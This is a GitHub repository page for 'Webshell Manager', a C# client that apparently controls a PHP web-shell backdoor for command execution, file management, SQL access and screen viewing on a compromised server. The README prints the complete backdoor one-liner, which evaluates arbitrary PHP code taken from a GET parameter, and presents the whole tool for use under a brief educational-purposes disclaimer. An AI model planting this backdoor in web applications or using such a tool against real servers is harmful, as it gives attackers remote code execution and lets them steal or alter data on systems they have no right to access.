Skip to content
Webshell Manager
C# PHP
Branch: master
Clone or download

Latest commit

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.github/ISSUE_TEMPLATE Update issue templates Sep 10, 2019
webshellManager fix https pb Apr 4, 2020
.gitattributes Initial commit Sep 4, 2019
LICENSE Initial commit Sep 4, 2019
README.md up changelog Apr 4, 2020
_config.yml Set theme jekyll-theme-modernist Apr 4, 2020
door.php +screenviewer Sep 9, 2019
webshellManager.sln fCommit Sep 4, 2019

README.md

Information

wsManager can be used to quickly execute commands on a server while pentesting a PHP application. The client interface is written in C#, which operate using a simple web-based backdoor implemented by user himself.

Once uploaded, the web shell can be accessed by the client at any time. Once successfully connected, the user proceeds to manipulate files and data on the web server.

The server-side code is extremely simple and contains just a single line of code :

<?php @eval($_GET["x"]); ?>

Many commands and control features:

  • File manager (upload, download, archiver, etc)
  • Command execution
  • PHP Exec
  • SQL Explorer
  • Screen Viewer (windows only)

Documentation

Coming soon

Screenshots

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.

Changelog

04/04/2020

  • PHP Code Execution
  • HTTPS Support

09/09/2019

  • ScreenViewer Added

Misc

Todo:

  • .
You can’t perform that action at this time.